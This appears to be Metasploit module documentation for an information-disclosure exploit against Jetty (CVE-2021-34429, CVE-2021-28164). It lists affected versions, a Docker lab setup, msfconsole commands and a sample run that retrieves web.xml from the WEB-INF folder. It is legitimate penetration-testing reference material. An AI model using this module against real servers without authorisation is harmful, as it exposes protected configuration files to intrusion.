CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

Jetty suffers from a vulnerability where certain encoded URIs and ambiguous paths can access protected files in the WEB-INF folder.

Versions effected are:

• 9.4.37.v20210219, 9.4.38.v20210224

• 9.4.37-9.4.42

• 10.0.1-10.0.5

• 11.0.1-11.0.5

Exploitation can obtain any file in the WEB-INF folder, but web.xml is most likely to have information of value.

CVE-2021-34429

Use the Docker image from ColdFusionX at https://github.com/ColdFusionX/CVE-2021-34429/blob/main/docker-compose.yml

Verification Steps

1. Install Jetty with an app that contains a WEB-INF folder

2. Start msfconsole

3. Do: use auxiliary/gather/jetty_web_inf_disclosure

4. Do: set rhosts

5. Do: run

6. You should get the contents of a file

Options

FILE

The file in the WEB-INF folder to retrieve. Defaults to web.xml

CVE

Which vulnerability to use. Options: CVE-2021-34429, CVE-2021-28164. Defaults to CVE-2021-34429

Scenarios

Jetty 11.0.5 from Docker

resource (jetty.rb)> use auxiliary/gather/jetty_web_inf_disclosure
resource (jetty.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (jetty.rb)> set rport 8080
rport => 8080
resource (jetty.rb)> set verbose true
verbose => true
resource (jetty.rb)> run
[*] Running module against 1.1.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found version: 11.0.5
[+] 11.0.5 vulnerable to CVE-2021-34429
[!] The service is running, but could not be validated.
[+] File stored to /home/h00die/.msf4/loot/20211108134054_default_1.1.1.1_jetty.web.xml_813220.xml
[+] <!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>